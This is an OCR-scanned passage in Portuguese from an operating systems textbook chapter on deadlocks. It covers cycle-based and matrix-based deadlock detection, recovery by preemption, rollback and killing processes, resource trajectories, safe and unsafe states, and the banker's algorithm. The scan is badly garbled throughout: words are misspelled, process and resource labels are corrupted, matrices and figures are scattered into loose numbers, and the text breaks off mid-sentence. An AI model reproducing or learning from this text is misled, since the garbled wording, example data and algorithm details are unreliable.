Nesta seęao, conheceremos algumas maneiras de detecęao 
dc impasses e como trata-los. 

6-4.1 I Detecęao de impasses com um 
recurso de cada lipo 

Vamos comeęar com o caso mais simples: quando exis- 
te somenie um recurso de cada lipo. Esse sistema pode 
ter um scanner, uma unidade de CD, um plotter e uma 
unidade de lita, mas nao mais do que um recurso de cada 
classe. Em outras palavras, por enąuaruo es tam os exdtiin- 
do os sistemas com duas impressoras. Trataremos deles 
poster to rrnente, a panirdc um metodo dilerenle. 

Para esse sistema, podemos construir uin graf o de re- 
cursos como o i lustra do na Figura ć.3. Um impasse cxiste 
se esse grab) contiver um ou mais ciclos. Qualquer proces¬ 
so que faęa parte de um ciclo esta em situaęao de impasse. 
Se nao hoiwer nenii um ciclo, o sistema nao estara em 
impasse. 

Como excmplo de um sistema mais complexo do quc 
os que analisamos ate agora, imagine um sistema com sete 
pro ces s oś, de A a G t e com seis recursos, de R a w, As in- 
formaęoes sobre quais recursos estao sendo u sad os em urn 
determinado instante e quais estao sendo reąuisitados sao 
as seguiotes: 

1. O processo zipossui o recurso Re requisita o recurso 

2. O processo R nada possui, mas reąuisita o recurso T, 

3. O processo C nada possui, mas rcquisiia o recurso 5. 

4. O processo Z) possui o recurso Ut reqtiisUa os recur¬ 
sos SeT. 

5. O processo Epossui o recurso T e requisita o recurso V. 

6. O processo F'possui o recurso W e reąuisita o recur- 
so S. 

7. O processo G possui o recurso V e reąuisita o recur- 
so U , 

A pergunta e a seguime: "Esse sistema esta em im pas¬ 
se? Se estiver, quais os processos envolvidos? w 

Para responder a essa ąuestao, podemos construir o 
grafo dc recursos da Figura 6,3(a), o qual coiltćm um 
ciclo que pode ser visto por inspeęao visual, 0 ciclo e 
mostrado na Figura 6.5(b). Podemos observar H por meio 
desse ciclo, que os processos D t H e G estao todos em 
situaęao de impasse. Os processos A t Ce F nao estao so- 
frendo impasse, pois o recurso S e passtvel de ser alocado 
a quałquer um deles, permitindo sua conclusao. Entao, 
os outros dois poderao obter o recurso e tambem ser fi- 
nalizados. (Observe quc, para tornar este exempio mais 
intcrcssanlc, permitimos quc o processo D solicitasse 
dois recursos ao mesmo tempo.) 


3. Na vcrdadc, essa parte do totdore ć tolice. Avcstruxes pudem corrcr a 60 kni/li c stiis caices sao ptłdorosos o suficie mc para rtiairir qualqucr leio quc 
esteja a tras dc uma tarta rekięao. 
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I Figura 6.5 (a) Unn grafico de recursos. (b) Um ciele extraicfo de (a). 


Ernbora seja relativamente simples detectar visual- 
mente os processos cm situaęao de impasse dentro de um 
grafa simples, para uso cm nm sistema real e necessario um 
algoritmo fornial de detecęao de impasses. Sao conheddos 
ni u i los algoritmos para detecęao de cidos em gra fos dirigi- 
dos* A segnir, mostraremos um algoritmo simples que ins- 
peciona um grafo e lermina ou quando encontra um rido 
ou ąuando percebe que nao existe neniium ddo. Ele usa 
urna estru tura de dados, L, unia lisia de nós, assim como a 
lista de arcos. Durante a execuęao desse algoritmo, os arcos 
seriio marca do s para indicar que ja bram insperionados, 
evitando, assim, inspeęoes repetitivas, 

0 algoritmo opera execmando os seguinies passos: 

!. Para cada nó — N no grafo — execute os cinco pas¬ 
sus seguinies, usando N como nó inidal. 

2. I nicią liże L como urna lista vazia e assinale todos os 
arcos como desmarcados. 

3. Insira o nó atual no finał da lista /, c verifique sc o nó 
agora aparece em /. duas vczes. Em caso a fi imali vo, 
o grafo cantem um ciclo {assinalado em i) c o algo¬ 
ritmo termina. 

4. A partir do referido nó, verifiquc se existe algiim 
arco dc saida dcsmarcado. Em caso aiirmativo, va 
para o passo 5; do contrario, va para o passo ó. 

5. Escolha aleaioriamente um a rco dc sarda desmar- 
cado e marque-o. Entao, siga esse arco para obter o 
novo nó atual c va para o passo 3. 

ó. Se esse nó for o inicial, o grafo nao contera ciclo 
algom e o algoritmo terminara. Scnao, o finał foi 
alcanęado. Remova-o e volte para o nó anterior — 
isto ć, aquclc ąuccra atual antes desse—, marque-o 
como atual e va para o passo 3, 

O que esse algoritmo faz e tomar cada nó, um após 
o outro, como a raiz do que se espera ser urna arvore, 
e fazer urna busca do lipo depth-firsL Se tomar a passar 
por um nó ja percorrido, isso significa que encontrou 
nm ciclo* Sc ja river percorrido todos os arcos a partir dc 
um nó qualquer, de retorna ao nó anterior* Se return ar 


ao nó-raiz e nao puder ir adiante, o subgrafo akanęa- 
vel a partir do nó atual nao contera ciclo algiim. Se essa 
propriedade for valida para todos os nos, o grafo imeiro 
nao possuira qualquer ciclo, dc modo que o sistema nao 
centem impasse. 

Para entender como o algoritmo funciona na prati- 
ca, vamos usa-lo no grafo da Figura 6. 5 (a). A orderu de 
processamcmo dos nos e arbitra ria; assim, vamos apenas 
inspedona-bs da esąuerda para a direita, de dnia para bai- 
xo, cxecutando o algoritmo primciro a partir de R c entao, 
su cessiva menie, A, B f C, S , D f ZE, Fe assim por dianie. Se 
for encontrado urn ciclo, o algoritmo parara. 

Comcęamos em R e inkializamos a lisia l como lisia 
vazia. En tao, acrescemamos Rb lista e nos deslocamos para 
a unka possibilidade, o nó A, to adicionamos a L t fazendo 
entao L - [R, A], A partir de A vamos para S, obtendo L - 
\R, A, S|. S nao tein arcos de saida, foręando um retorno 
para A. Como A nao tern qualquer arco dcsmarcado, retor- 
namos a R, compktando nossa inspcęao a partir dc R, 

Agora reinicializamos o algoritmo parrindo de A t rei- 
nirializando a lista L como lista vazia. Essa busca tambem 
para rapidameme, de modo quc reinicializamos de novo a 
partir de B. De B contin ua mos a seguir os arcos de saida a te 
encontrarmos D, quando L - [B, Z E t V, G , U t D}. Devemos 
entao fazer urna escolha (aleatória)* Sc cscollicrmos S, va- 
inos para um nó sem saida c retomamos a D . Na segunda 
ten la U va, escolhemos T e alualizamos L para ser [B r Z E f V t 
G r U ( D, 7], ponto em qne descobrimoś o ciclo e para mos 
o algoritmo, 

Esse algoritmo esta longc dc ser ótimo* Para um algo¬ 
ritmo md hor, veja Evcn (1979). Dc qua lqucr modo, de 
demonslra que exisle urn algoritmo para a detecęao de 
impasses. 

6.4,2 I Deteccao de impasses com 

multiplos recursos de cada tipo 

Quando existcm varias cópias de algiim recurso, e 
necessario um metodo diferente para detectar impasses. 
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Yeremos agora um algoritmo, baseado em matrizes, para a 
detecęao dc impasses entre n processos, de P t a P p . Seja m 
o n ii mero de dasses de rccursos, com E t rccursos dc classc 
L rccursos dc dasse 2 e, generalizando, E i rccursos dc 
classc i { 1 < i < w?}. E e o vetor de recursos existentes; 
de fornece o mimem total de instancias de ca da recurso 
existente. Por exemplo, se a dasse 1 for de unidades de fita, 
cntao E l = 2 sigm Ikara que o sistema tcm duas unidades 
de fita, 

Em um instame qualquer, alguns dos rccursos se en- 
eon tram alocados a proccssos e, por isso, nao estao dispo- 
mvd$. Seja A o vetor de rccursos dispomveis, com 4 
fornecendo o nu mero de insiancias do recurso / disponkeis 
(isto ć, nao alocadas) nesse instame. Se ambas as unidades 
de fila csiiverem alocadas, A x sera 0. 

Precisamos cntao dc dois veiores: G a matriz de alo¬ 
caęao atuai, e R t a matm de reąuisięao. A i-esima lin ha 
de Cinforma ąuantas instancias de cada dasse de recurso 
o processo P. possui no momenio. Assim, Ce o nu mero de 
instancias do recurso / que estao alocadas ao pmcesso i. Da 
mes ma maneira, Re o numer o de instancias do recurso j 
que P.qucr* Essas ąuatro estruturas de dados sao most rad as 
na Figura 6.6. 

Unia import a me condięao invariante se aplica a essas 
ąuatro estruturas de dados. Em particular, cada recurso 


Recursos existentes 

< E 1’ E 2' E 3. E m) 

Matriz de alocaęao atuai 

c ia C 13 ' ' ' C lm 

C 22 C 23 ł ł " C 2nł 



C n2 C rt3 ' * ' C rtrti 

V_ Linhaneaalocaęao 

atual para o processo n 


Recursos disponiveis 
(A 13 A 3 , .... A m ) 


Matriz de requisięóe$ 



n2 


R, 


na 


2m 


R. 


Linha 2 infornna qual aa 
necessidade do processo 2 


Fig u ra 6.6 As quatro estruturas de dados necessańas ao 
I algoritmo de cieteeęao de impasses. 


esta alocado a um processo ou se encontra disponkel. Isso 
significa que 

/=! 

Em outras palavras, se fizermos o somatório de todas 
as instancias do recurso j ja alocadas e adicionarmos a isso 
todas as instancias ainda dispomveis, o resultado sera o nu- 
mcro de instancias existentes daąuela dasse dc recursos. 

O algoritmo de detecęao de impasses baseia-se na com- 
paraęao de veiores. Yamos deluiii a relaęao A < B f entre dois 
vetores A e B, para indicar que cada elemento de A e menor 
ou igua! ao demento correspondenle de B. Matematica- 
meme, A < B se aplica se e soniente se A.< B, para 1 < /< m, 

Inicialmenie, todos os processos estao desmarcados. A 
medida que o algoritmo prossegue sua execuęao, os pro¬ 
cessos sao mareados, indicando que eles estao apios a com- 
pletar sens processamenlos sem sofrer impasses. Quando o 
algoritmo terminar, todos os processos que ainda permane- 
cerem desmarcados estarao em situaęao de impasse. Esse 
algoritmo supoe que todos os processos manterao os recur¬ 
sos que adquirirem ale que terminem. 

O algoritmo de detecęao de impasses agora pode ser 
apresentado como a seguir. 

L Procure um processo desmarcado, P it para o qual a 
Aesima linlia de ^ seja menor ou igual a correspon- 
den te de A. 

2. Se cssc processo for encontrado, adidone a Aesima 
linha de C a correspondentc dc A, marąue o proces¬ 
so c voltc para o passo 1. 

Se nao existir esse processo, o algoritmo terminara, 

Quando o algoritmo terminar, todos os processos des¬ 
marcados, caso existam r estarao em situaęao de impasse. 

O algoritmo cm scu passo 1 estara procurando um pro¬ 
cesso que possa ser executado a te ser concliudo. Esse 
processo e caractcrizado por ter ncccssidades dc recursos 
quc podem ser satisfeitas pclos rccursos disponiveis nes- 
se determinado instame. O processo selecionado c P cntao, 
colocado em execuęao ate terminar, ąuando devolvera os 
rccursos a de a locados a o pool dc recursos dispomvds. A 
partir disso, cssc processo e marcado como terminado. Sc 
ao lina! todos os processos estiverem apios a serem execu- 
tados, nenlmrn deles estara em impasse. Se ha possibilida- 
de de alguns deles ficarcm sem exccutai; des estarao em 
situaęao de impasse. Einbora o algoritmo seja nao deter- 
ministico (os processos podem ser executados em qualquer 
ordem possivcl), o resultado c semprc o mesmo. 

Fara exemplificar como o algoritmo de detecęao de 
impasses funciona, observe a Figura 6.7. Nela ternos tres 
processos e ąuatro classes de recursos, as quais rotulamos 
arbttrarianieme como unidades de fita r plotters, scanners e 
urna unidade de CD-ROM. 0 processo 1 possui um scan- 
ner. O processo 2 possui duas unidades de iita e urna uni¬ 
dade de CD-ROM. O processo 3 tein um piotler e dois scan¬ 
ners. Cada processo precisa de recursos adidonais, tal como 
most rad o pcla matriz R. 
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Matriz aiocaęao atual Matriz de requisięoes 


_ 6-4.51 Recuperacao de situaęóes de 

impasse 

Suponha que nosso algoritmo de detecęao de impasses 
lenka sidu bem-sucedkło, localizando um impasse. O que 
fazer em seguida? £ necessario reaiperar, de algnm modo, 
o sistema dessa situaęao e coloca-lo novamente em condi- 
ębesnorniais de execuęao. Nesta seęao, discutiremos diver- 
sas maneiras dc fazer isso. No enfanto, voce vai percebcr 
que nenhnmn dclas se mostrara intcrcssantc. 


0 

0 

1 

0 


2 

0 

0 

1 

2 

0 

0 

1 

R = 

1 

0 

t 

0 

0 

1 

2 

0 


2 

1 

0 

0 


Figura 6.7 Um exemp1o para o algoritmo da detecęao de 
impasses. 

Para executarmoś o algoritmo de deiecęao de impas¬ 
ses, procuramos um processo cujas necessidades de recur- 
sos possani ser satisfeitas. O primeiro processo nao pode 
ser satisfdto, pois nao existc nenhuma unidade de CD¬ 
-ROM disponkel. O segnndo processo tambem nao pode 
ser satisfdto, pois nao existe nmhum scanner Ikrę. Fe- 
Kzmente, o tcrcdro processo pode ser satisfdto, de modo 
que, ao terminar sita execuęao, devolvera todos os sens re- 
cursos ao pool de recursos disponkeis, fazendo 

A = (2 2 2 0) 

Nesse porno, o processo 2 pode ser executado e P após 
sua execuęao, dcvolver seus recursos a o pool de recursos 
disponkris, fazendo 

A = (4 2 2 1) 

Agora, o processo restante pode ser cxecutado. Nao 
exisLe netilium impasse no sistema. 

Considere agora urna peąuena modificaęao na siuta- 
ęao da Figura 6.7. Suponha que o processo 2 precise dc 
urna unidade de CD-ROM alem de duas unidades de fita c 
do plolter* Nenhuma dessas reąnisięoes pode ser satisfdla; 
assim, todo o sistema estara em situaęao de impasse. 

Ja que sabemos como detectar impasses (pclo menos 
com solicitaęoes de recursos previamentc conhcddas), sur- 
ge a ąuestao de quando procurar por des. Urna possibiłi- 
dade e eeriflcar loda vez que urna requisięao de recurso for 
feita. Po demos, assim, detecta-los o maiscedo possfvel, mas 
e poiencialrn.cn lc caro em termos de tempo de CPU- Urna 
cstratćgia alternativa e verificar periodlcamentc a ca da k 
minutos om taivez, semen te ąuando a necessidade de utili- 
zaęao da CPU tiver cafdo abalxo de um certo lim ile. A razao 
para ęonsiderar a utilizaęao da CPU e que, quando mui- 
tos processos estkerem em situaęao de impasse, restarao 
po u cos processos aptos a continuar sua execuęao e a CPU 
muitas vczes estara ociosa. 


Recuperaęao por meio de preempęao 

Em algtms casos, pode ser posstvel retoniar proviso- 
riameme um recurso de sen proprieiario a mai para da-lo 
a outro processo. Muitas vezes u ma mtervenęao manuał 
pode ser necessaria, especialmenie em sistemas operario- 
nais de processamento em iole (batik) executados em com- 
putadores de grandę porte. 

Por exempto, para retom ar urna impressora a laser de 
seu processo-proprieiario atual, o opera do r pode juntar 
todos os formularios ja impressos e coloca-los em urna pi¬ 
łka. Em seguida, o processo pode ser suspenso (marcado 
como nao executavd). Nesse porno, a impressora pode ser 
libr rada para ornro processo. Quando esse segtmdo proces¬ 
so terminar, a piłka de formularios ja impressos pode ser 
devolvida a bandeja de safda da impressora, e o processo 
anterior e rei niciali zada 

A kabilidade para retirar um recurso de um processo, 
entrega-lo a outro processo e depois devolve-lo ao primei¬ 
ro, sem que o processo perceba, e ahameme dependeme da 
natureza do recurso. Alguns recursos tornam essa operaęao 
muito dificil ou mesmo imposskeL A escolha do processo 
quc sera suspenso depende ampiamente de quais processos 
tem recursos passiveis de serem fa cii men te retomados- 

Recuperaęao por meio de retrocesso 

Se projetistas de sistemas e operadores dc maąuinas 
sou herc m da possibilklade de ocorrcncia dc impasses, 
provavdmente poderao fazer com que os processos pc- 
nodicamcute gerem pontos de salvaguardo (checkpoints). 
Verificar um processo, nesse caso, śignifica ter seu estado 
guardado cm um arquivo, de modo que possa ser reini- 
eializado posicnormente* Esse arquivo contern nao só a 
imagem da mc mór i a, mas tambem o estado dos recursos, 
isto e, qtiais recursos estao em um determinado instan- 
tc alocados ao processo. Para tnalor elidencia, cada novo 
ponto de sakaguardo dcve ser escrito em um novo ar- 
qutvo, nao cscrlta sobre o arquivo antenor, dc modo quc, 
ao ser executado, um processo acumule urna seąucncici 
completa de sakaguardo, 

Quando um impasse e detectado, torna-se facil ver 
quais recursos sao necessados. Para fazer a recuperaęao, 
um processo que tern um dos recursos necessarios ć re- 
vertido para um estado em um instante anterior ao mo- 
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memo em que adquiriu algum outro recurso, e isso e feiio 
simplesmente reinidalizando o processamento a partir de 
um dc sens pontos dc salvaguardos anieriores. Todo o ira- 
balho fcito dcsde esse porno e perdido (por cxemplo, as 
impressocs dcsde o ultimo ponto dc salvaguarda dcvcm 
ser descartadas, visto que scrao impressas novamente). Na 
vcrdadc, o processo sera rdnicializado para um momento 
anlcrior, quando de ainda nao pościna o recurso, que e 
agora alocado a um dos processos em situaęao de im passe, 
Se o processo que sofreu reversao de estado lemar adquirir 
o recurso nova menie, eie tera de esperar ate o recurso estar 
disponfyeL 

Retuperaęao por meio da eliminaęao de processos 

A maneira mais grosseira de diminar um impasse, mas 
tambem a mais simples, ć 'matar' um ou mais processos. 
Urna possibilidade e matar um processo presente no cido, 
Corn mu potico de sortc, os demais processos sera o capazes 
de prosseguir. Se nao for suficiente, essa aęau pod era ser 
repetida ate o dclo ser quebrado. 

Dc outro modo, um processo nao preseme no cido 
pode ser eseolhkio como vftlma para liberar seus recursos. 
Por esse metodo, o processo a ser morto sera cuidadosa- 
mente escolhido por deier recursos necessarios a alguns 
processos no cido. Por exernplo, utn processo pode estar de 
posse de uma inipressora e querer um plotter, com outro 
processo detendo um plotter e qtierendo uma inipressora. 
Esses dois processos estao em situaęao de impasse. Um ter- 
ceiro processo pode reier outra inipressora ideniica e outro 
plot ter identico e estar exeauando, feliz da vida. Ao matar 
o terceiro processo, esses recursos sao liberados, remoyen- 
do a situaęao de impasse entre os primciros dois processos. 

Sempre quc possivd, e md hor matar um processo ca- 
paz de ser reexeculado dcsde scu inicio, a fim dc cvilar 
efeitos colaterais* Por exemplo r unia compilaęao sempre 
pode ser reexecutada porque tudo o que da faz c ler um ar- 
quivo-forue e produzir um arquivo-objett\ Se da for morta 


durante uma execuęao, essa execuęao nao tera nenhuma 
influenria sobre a próxima execuęao. 

Por outro lado, um processo que atuałiza um banco dc 
da dos nem sempre e passivd de ser executado com segu- 
ranęa uma segunda vez. Se o processo adiciotia J a algum 
registru da base de dados, execuia uma vez, e mono e de- 
pois e exeeutado novamente, tera adicionado 2 ao registru 
em vez de 1, o que e incorreto. 



Ęyitando impasses 


Na discussao acerca da detecęao de impasses, presumi- 
mos tadtanienie quc, quando um processo requisita recur¬ 
sos, cle os rcquisita todos dc unia só vez (a niatriz R da Fi¬ 
gura 6.6). No cntanLo, na maioria dos sisiemas, os recursos 
$ao requisitados um de ca da vez, 0 sistema deve ser capaz 
de decidir se liberar um recurso e seguro ou nao e semen¬ 
ie fazer uma alocaęao quando ela for segura. Assim, surge 
uma questao: existe algum algoritmo que sempre permita 
evłtar impasses fazendo sempre a escollia correta? A res- 
posta e um sini com reslrięoes — podemos cvitar impasses, 
mas somente ąuando certas informaęoes estiverem dispo- 
niveis aiitedpadamentc. Ncsta seęao, verenios como eviiar 
impasses alocando os recursos cutdadosamente. 


6.5,1 I Trajeiórias de recursos 

Os algom mes principais para evitar impasses sao base- 
ados no conceiio de estados seguros. Antes de descrever es¬ 
ses algoritmos, farenios uma breve digressao para mostrar 
o conceiio de seguranęa, de uma maneira grafica e facii de 
ser entendida. Embora a abordagem gratka nao possa ser 
traduzida diretamente cm um algoritmo utilizavel, ela nos 
da uma boa idcia da naturę za do problcma* 

Na Figura 6.8, vemos um modelo que envolve dois 
processos e dois recursos — por exemplo, uma inipressora 
e um plotter. O eixo liorizontal representa o numero de 


Impressora 


Rotter 



I m p r esso ra -*- 

Plotter 


1 Figura 6.8 A trajetória de recursos de dois processos. 
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instruęoes executadas pdo processo A. O eixo yertical re- 
presenta o numer o de instruęoes executadas pdo processo 
&. Em l [t A reąuisita u ma impressora; cm l r A necessiia de 
urn plotLer. A impressora e o plotier sno liberados, respccti- 
va nieme, cm /, e J v O processo B necessita do plotier de / ? 
a / 7 e da impressora de /. a L. 

Cacia ponto no diagrama reprcscnta um estado dejun- 
ęao dos dois proeessos. Inicialmenie, o estado esta em p t 
onde os proeessos ainda nao exeanaram non im ma ins- 
truęao. Sc o escalonador escolher cxecutarA cm pomei.ro 
lugar, iremos para o ponto ą, no qual A tera executado al- 
gumas instruęoes, mas B nao tera cxecuiado nenhuma, No 
ponto q t a trajetória passata a ser vertical, indicando que o 
escalonador tera escolhido B para ser executado. Com um 
unico proeessador, todos os caminhos dcvem ser horizon- 
tais ou venicais, nunca diagonais. Alem disso, o rnovimen- 
to e sempre para o norte ou o lestc, nunca para o stil ou o 
oesie (clara, proeessos nao podem voltar para tras em suas 
execuęoes), 

Ouando A atrayessa a linha / L no caminho dc r a j, de 
reąuiska e ganha o direiio de usar a impressora. Quando B 
alcanęa o ponto t f cle reąuisita o plotier. 

As regioes hadiuradas sao de interesse espedal. A re¬ 
giao com linhas indinadas a dircita indica quc os dois pro- 
cessos situ Lilia neamente tern posse da impressora. A regra 
de exclusao miitua torna impossivel entrar nessa regiao. 
Do mesmo modo, a regiao com linhas indinadas a esquer- 
da indica que os dois proeessos estao simultanea nieme dc 
posse do plotter, tomando aquele procedimento igualmcn- 
te impossiveL 

Sempre que o sistema entrar no quadrado delimitado 
latem Imcnte por /, e l 2 c por /, e ! <t no topo e na base, aca- 
bara por entrar em impasse ąuando passar pela imersecęao 
de i, c / frł Nesse ponto, A esta reąuisitando o plotier e B 
esta reąuisitando a impressora, mas ambos ja se encontram 
alocados. Assim, todo esse quadrado e inseguro e nao deve 
ser penetrado. No ponto t a unica coisa segura a fazer e 
execmar A ate que esic alcance A panir disso, ąualąuer 
trajctóna aić u sera segura. 

Algo Imponante a ser visto nestc cxemplo e o ponto 
t, ondc B estara requisitando um recurso. O sistema devc 
decidir se Ihe da ou nao o direito de uso. Sc o direiio dc nso 
for concedido, o sistema entrara em u ma regiao insegura 


e acabara por entrar em impasse. Para evitar o impasse, B 
devera ser suspenso ate A reąuisitar e liberar o plolter. 

_ 6,5.2 I Estados seguros e inseguros 

Os algoritmos que evitam impasses c que passaremos a 
estudar agora u sam inforinaęoes da Figura 6.6. A qualquer 
iustarue, ha um estado attial que consiste dc E, A, Ce R. Um 
estado e considerado seguro sc cle nao esta em situaęao 
dc impasse c se existe algutna ordem dc escalonatnemo na 
qual todo processo possa ser cxecuiado ate sua conclusao, 
mesmo se, repeminamente, todos des reąuisilcm, de unia 
só vez, o maximo poss£vel de rccursos. E mais facil ilustrar 
esse conceito a partit de um cxemplo de uso de um recun 
so. Na Figura 6.9(a), lemos um estado no qual A tern tres 
instancias do recurso, mas cveniualmcnic pode precisar 
dc ate nove. & atualmcnte tern duas e pode precisar mais 
adiantc dc ate quatro no totah Da mesma nianeira, Ctam- 
bem tein duas, mas pode precisar de cinco adicionais. Exis- 
tc um total de dez instancias, dc modo que seie recursos ja 
estao alocados e ires estao ainda disponfyeis. 

O estado da Figura 6,9(a) e seguro porque cxistc urna 
scquencia de atocaęocs quc pemiitc quc todos os proeessos 
sejam concluidos. Em out ras palavras, o escalonador po- 
deria simplcsmente executar B de modo exclusivo, aie ele 
rcquisitar c obter mais duas instancias do recurso, levando 
ao estado da Figura ó.9(b). Quando B complcta, obtemos o 
estado da Figura 6.9(c). Enlao, o escalonador pode exeeu- 
tar C cvcntualmeme levando ao estado da Figura 6.9(d). 
Quando C completa, obtemos a Figura 6.9(e). Agora, A 
pode obter as scis instancias do recurso de quc ele ncCes¬ 
sna c tarnbem co nipie tar sua exccuęao. Assirn, o estado da 
Figura 6,9(a) e seguro porque o sistema, escalonando cui- 
dadosamente, pode evitar impasse. 

Agora, suponlia que tenhamos o estado inicial most ra¬ 
do na Figura óJO(a), mas, dessa vez, A requisitara e obiera 
o turo recurso, levando a Figura 6J0(b). Sera que podemos 
cncontrar unia seąuencia de alocaędes quc funcione com 
certeza? Vainos tentar. O escalonador pode executar Bate 
ele ter requisitado todos os sens rccursos, como mostrado 
na Figura 6,10(0* 

Por firn, B completa, e assini obtemos a situaęao da 
Figura ć.lO(d). Nesse ponto estamos presos. Temos so- 
mente quatro instancias livres do recurso, mas cada um 
dos proeessos ativos prccisa de cinco. Nao exisie nenhuma 


Possui max. 


Possui max. 


Possui imax. 


Possui maK. 


Possui max. 



(a) (b) (c) (d) (e) 


I Figura 6,9 Demonstraęao de que o estado em [a} e seguro. 
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Possui max. 


A 

3 

B 

B 

2 

4 

C 

2 

7 


Dispom'vel: 3 
(a) 


Possui max. 


A 

4 

9 

B 

2 

4 

C 

2 

7 


Disponfvel: 2 
(b) 


Possui mśx. 


A 

4 

9 

B 

4 

4 

C 

2 

7 


DisporweJ; 0 
(c) 


1 Figura 6*10 Demonstraęao de que o estado em (b) e inseguro. 


Possui max. 


A 

4 

9 

B 

- 

- 

C 

2 

7 


Disponivel: 4 
Cd) 


scąućncia que garama a conclusao* Dcssc modo, a decisao 
dc alocaęao quc movc o sistema da Figura 6*10(a) para a 
Figura 6.10(b) ocasiona a mudanęa dc mn estado scguro 
para urn estado inseguro* Executar A ou Ca partir da Figu¬ 
ra 6*i0(b) nao facilitara em nada* Yokando um pouco no 
tempo, a reąuisięao de A nao podera ser aceita. 

£ import antę notar que uni estado inseguro nao e uma 
situaęao de irupasse. A partir da situaęao da Figura ó*10(b), 
o sistema pode continuar sua execuęao durante um certo 
tempo* Na verdade, um processo pode mesmo ser compie- 
lado. Alem disso, e possfrel que A libere um recurso antes 
de reqiMtar outro, permitindo a Cser completado, evitan- 
do o impasse. Assim, a di Te ren ęa enue um estado seguro e 
um inseguro e que, a partir de um estado seguro P o sistema 
pode garantir que todos os processos terminarza ao passo 
que, a partir de um estado inseguro, essa garantia nao pode 
ser dada. 


6. 5.31 O algoritmo do banqueiro para um 
unico recurso 

Um algoritmo dc escaionamcnio que pode cvitar im- 
passes, deseńvolvido por Dijkstra f 1965), e conhecido como 
algoritmo do banąueiro c constitui uma extensao do al- 
goritmo dc dctccęao dc impasses dado na Seęao 6*4.1. Ele 
e modela do da seguime maneira; um banąueiro dc uma 
pequena cidade pode ncgociar corn urn grupo de cHentes 
para os quais libera linhas de credito* O que o algoritmo 
faz e verificar se a liberaęao de uma reąuisięao e capaz de 
levar a um estado inseguro. Em caso positivo, a reąuisięao 
sera negada. Se a liberaęao de uma reąuisięao levar a um 
estado seguro, ela sera atendida. Na Figura 6.11 (a), vemos 
ąuatro dientes, A t E r Ce D. A cada um deles fol alocado um 


Possui m£x. 


Possui max. 


Possui m 



(a) (b) (c) 


I Figura 6.11 Tris estabos da alocaęao da recursos: 
(a) Seguro. (b) Seguro, (c) Inseguro. 


certo numer o dc unidades de crcdito {por cxcmplo, uma 
unidadc dc crcdito cquivalc a 1 K dólarcs). O banąuciro 
sabe que nem todos os dientes prccisam imediatamentc de 
todas as su as unidades de credito, de modo que cle tern 
em caixa somente dez unidades de credito para servi-los, 
em vez de 22 unidades* (Nessa analogia, os clientes sao os 
processos, as unidades de credito sao, di gam os, unidades de 
fita, e o banąueiro e o sistema operaeional.) 

Os dientes cuidam dc scus respectivos ncgócios* fa- 
zendo, period Łca me mc, reąuisięoes dc empresiimos (isto e, 
solid lando recursos). Em um certo momento, a situaęao c 
a most rada na Figura 6.11 {b}* Essc estado c seguro porąue, 
com duas unidades disponiveis em caixa, o banąuciro pode 
atender as solicitaęoes de C, permitindo assim que C termi- 
ne e libere todos os seus ąuatro recursos. Com ąuatro cre¬ 
dit os na mao, o banąuciro pode permitir ąue D ou B tenha 
os creditos desejados, c assim por dianie. 

Imagine o que aconteceria se uma reąuisięao de B 
por mais uma unidade de credito fosse atendida na Figura 
6.i I (b). Terfamos entao a situaęao da Figura 6,11 (c), a qual 
e insegura. Se todos os clientes de repente solicitassem o 
emprestimo de todas as suas unidades de credito, o ban- 
ąueiro nao poderia atender nenhum deles, o que configura- 
ria uma situaęao de impasse, Um estado inseguro nao pre- 
cisa nccessanamente levar a um impasse* pois um cliente 
pode nao predsar de todas as unidades de credito disponi- 
veis, mas o banąuciro nao deve contar com essa supostęao. 

O algoritmo do banąuciro considera cada solicitaęao de 
emprestimo quando ela ocorre, analtsando se sua conces- 
sao levara a um estado seguro, Se levar, a reąuisięao sera 
atendida; caso contrario, ela sera adiada. Para saber se um 
estado e seguro, o banąuciro verifica se cle dispoe de re- 
cursos sufidentes para satisfazer algum dos clientes* Se sim, 
presume-se que os emprestimos a esse diente sera o pagos 
|devolvidos); em seguida, o diente mais próximo ao limite 
e considera do, e assim por dianie. Se todos os empresiimos 
puderem ser pagos (devolvidos), o estado sera seguro e a 
reąuisięao inicial podera ser atendida. 

_ 6.5.41 O algoritmo do banqueiro com 

multiplos recursos 

O algoritmo do banąueiro pode ser generałizado para 
tratar multiplos recursos. A Figura 6.12 mostra como ele 
fundona. 
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Figura 6.12 0 algoritmo do banqueiro com multiplos 
recursos. 

Na Figura 6J2, vcmos duas mairizes, A primeira, do 
lado esquerdo, mostra quanio de cada recurso atualmente 
esla alocado para cada um dos cinco processos. A matriz do 
lado direito mostra de quamos recursos cada processo ain- 
da precisa para compleiar sua execuęao. Essas matrizes sao 
justamente as mairizes Ce R da Figura 6,6, Como no caso 
de um liii ico tipo de recurso, os processos devem dęciarar 
antes da execuęao todos os recursos de que vao precisar, 
para que o sistema possa, a cada instante, calcu lar a ma tri z 
do lado direiio. 

Os tres vetores a direita da figura mostram, respectiva- 
mcnte, os recursos cxistcntes, E, os recursos alocados, P, cos 
recursos dispouweis, A. E revela que o sistema lem seis tmi- 
dades de lita, tres plotiers, quairo impressoras e duas unida¬ 
des de CD-ROM, Desses recursos, cinco ariona dores dc 
lila, tres plolters, duas impressoras e duas unidades de CD- 
-ROM sc encontram alocados, Esse falo pode ser observa- 
do somando-se as quatro colunas de recursos na matriz do 
lado esąuerdo* O vetor dc recursos dispormcis c simplcs- 
mente a diferenęa enire aquilo que o sistema lem e aquilo 
que atualmenle esta cm uso prios processos. 

O algoritmo que verilica sc um estado c seguro e des- 
crito a seguir: 

1, Procure uma linha, R, tujas ncccssidades dc recur¬ 
sos sejam todas inferiores ou iguaisa A. Se na o eris- 
tirncnluima lin ha com cssas caractcristicas, o sislc- 
ma acabara por entrar em sit u a ęa o dc impasse, visto 
quc nenhum processo pode ser execuiado ate sua 
condusao (presumindo quc os processos mantem 
todos os recursos ale que terminem). 

2, Considerc que o processo da linha eseoihida reąui- 
sita todos os recursos dc que precisa (o quc sc ga- 
rante ser posswel) e termina* Marque esse processo 
como Lcrminado e adidone ao vctor A todos os re- 
cursos quc Ihe pert cuda m, 

3, Repita os passus 1 e 2 ale que todos os processos se¬ 
jam marcados como term i nad os, quc e o caso segu¬ 
ro, ou ale ocorrcr um impasse, quc ć o caso inseguro. 


Se varios processos sao elegweis para serem escoJliidos 
no passo 1, nao importa qual deles e selecionado: o poo! 
de recursos dispomyeis pode ficar maior ou, na piór das 
hipóteses, permanecer o mesmo, em funęao da ordem de 
atendimento aos processos. 

Agora vamos voltar ao emnplo da Figura 6.12. O esta¬ 
